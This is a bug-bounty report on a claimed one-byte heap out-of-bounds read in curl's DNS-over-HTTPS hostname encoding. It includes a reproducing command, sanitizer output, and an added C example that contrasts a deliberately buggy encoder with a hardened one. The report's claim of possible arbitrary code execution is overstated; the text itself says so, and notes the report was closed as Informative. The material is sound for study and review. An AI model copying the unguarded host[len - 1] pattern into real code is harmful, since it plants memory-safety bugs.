Heap-buffer-overflow (Out-of-Bounds Read) in DoH hostname encoding

None
C
curl
Submitted None
Reported by reporascal_1

Vulnerability Details

Technical details and impact analysis

Out-of-bounds Read
**Summary:** I found a heap-buffer-overflow in the `doh_req_encode` function in `lib/doh.c`. The bug happens when curl processes a DNS-over-HTTPS request for a hostname that is an empty string. The code gets the string length as 0, then tries to access `host[len - 1]`, which becomes `host[-1]`. This is an out-of-bounds read. It reads memory just before the allocated buffer.

-----

### **Steps to Reproduce:**

1. Compile curl with AddressSanitizer.

   ```bash
   autoreconf -fi
   CFLAGS="-g -fsanitize=address" ./configure --with-openssl
   make
   ```

2. Run this simple command. The arguments `0` and `'‌'` cause curl to process an empty string hostname.

   ```bash
   ./src/curl 0 --doh-url 0 '‌'
   ```

3. The program will crash and you'll see the ASan report.

   ```
   ==2649804==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7c1ff51e756f at pc 0x5555556dd998 bp 0x7fffffffc9c0 sp 0x7fffffffc9b0
   READ of size 1 at 0x7c1ff51e756f thread T0
       #0 0x5555556dd997 in doh_req_encode /home/anuja/curl1/curl/lib/doh.c:115
       #1 0x5555556dd997 in doh_probe_run /home/anuja/curl1/curl/lib/doh.c:306
       #2 0x5555556de35b in Curl_doh /home/anuja/curl1/curl/lib/doh.c:487
       #3 0x55555561f0ee in Curl_resolv /home/anuja/curl1/curl/lib/hostip.c:923
       #4 0x55555567ae1c in resolve_server /home/anuja/curl1/curl/lib/url.c:3305
   ```

## Impact

Crash or, potentially, arbitrary code execution.
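The bug class the report describes, reading `host[len - 1]` to strip a trailing dot before confirming that `len > 0`, as an added example in C. This is not curl's `doh_req_encode` and not part of the report: it is a minimal RFC 1035 QNAME encoder (length-prefixed labels ending in a zero byte) with the unguarded read beside a hardened variant that rejects the empty name first. The names `encode_labels`, `qname_encode_buggy`, `qname_encode_safe`, `encodes_to` and `rejects` are hypothetical. Two caveats a reader should keep in mind: the ASan output above is a READ of size 1, so what is demonstrated is a crash under a sanitizer and, at most, a one-byte information leak rather than the arbitrary code execution the impact line suggests; and the report metadata below shows curl closed it as Informative.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed illustration (not curl's code): a hostname "a.b" becomes the
 * wire-format name \001a\001b\000 (RFC 1035 section 3.1). Each label is
 * prefixed by its length and the name ends with a zero-length root label.
 * Returns the number of bytes written, or 0 on error. */
static size_t encode_labels(const char *host, size_t len,
                            unsigned char *out, size_t outlen)
{
    size_t pos = 0;
    size_t start = 0;

    while (start < len) {
        size_t end = start;
        while (end < len && host[end] != '.')
            end++;
        size_t lablen = end - start;
        if (lablen == 0 || lablen > 63)       /* "a..b", or label too long */
            return 0;
        if (pos + 1 + lablen + 1 > outlen)    /* length byte + label + final 0 */
            return 0;
        out[pos++] = (unsigned char)lablen;
        memcpy(out + pos, host + start, lablen);
        pos += lablen;
        start = end + 1;
    }
    if (pos + 1 > outlen)
        return 0;
    out[pos++] = 0;                           /* root label terminates the name */
    return pos;
}

/* Buggy variant: strips a trailing dot by reading host[len - 1] without
 * checking len > 0 first. For host == "" this reads host[-1], the byte just
 * before the buffer, which is the out-of-bounds read ASan reports. */
size_t qname_encode_buggy(const char *host, unsigned char *out, size_t outlen)
{
    size_t len = strlen(host);
    if (host[len - 1] == '.')                 /* BUG: host[-1] when len == 0 */
        len--;
    return encode_labels(host, len, out, outlen);
}

/* Hardened variant: reject the empty name before host[len - 1] is touched,
 * and reject a name that is only "." once the trailing dot is removed. */
size_t qname_encode_safe(const char *host, unsigned char *out, size_t outlen)
{
    size_t len = strlen(host);
    if (len == 0)
        return 0;
    if (host[len - 1] == '.')
        len--;
    if (len == 0)
        return 0;
    return encode_labels(host, len, out, outlen);
}

typedef size_t (*qname_fn)(const char *, unsigned char *, size_t);

/* Test helper: 1 if fn encodes host to exactly the expected wire bytes. */
int encodes_to(qname_fn fn, const char *host, const char *expect, size_t expectlen)
{
    unsigned char buf[256];
    size_t n = fn(host, buf, sizeof buf);
    return n == expectlen && n != 0 && memcmp(buf, expect, n) == 0;
}

/* Test helper: 1 if the hardened variant rejects host (returns 0 bytes). */
int rejects(const char *host)
{
    unsigned char buf[256];
    return qname_encode_safe(host, buf, sizeof buf) == 0;
}

int main(void)
{
    unsigned char buf[256];
    /* Heap-allocate the empty string so that, as in the report, the byte at
     * host[-1] sits in a heap redzone that ASan can flag. */
    char *empty = calloc(1, 1);
    if (!empty)
        return 1;

    printf("safe  (\"example.com.\") -> %zu bytes\n",
           qname_encode_safe("example.com.", buf, sizeof buf));
    printf("safe  (\"\")             -> %zu bytes (0 = rejected)\n",
           qname_encode_safe(empty, buf, sizeof buf));
    /* Built with -fsanitize=address, this call reports a heap-buffer-overflow
     * READ of size 1 one byte before the 1-byte allocation. */
    printf("buggy (\"\")             -> %zu bytes\n",
           qname_encode_buggy(empty, buf, sizeof buf));
    free(empty);
    return 0;
}
```

Build the file (named `qname.c` here as an assumption) with `gcc -g -fsanitize=address qname.c -o qname && ./qname` to see the sanitizer report from the last call; without ASan the read of `host[-1]` is silent undefined behaviour, which is why this class of bug is found by fuzzing under sanitizers rather than in normal use. The fix is the shape to look for in review: any `buf[len - 1]` on a caller-controlled string needs a `len > 0` guard before it, not after.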

Report Details

Additional information and metadata

State

Closed

Substate

Informative

Submitted

Weakness

Out-of-bounds Read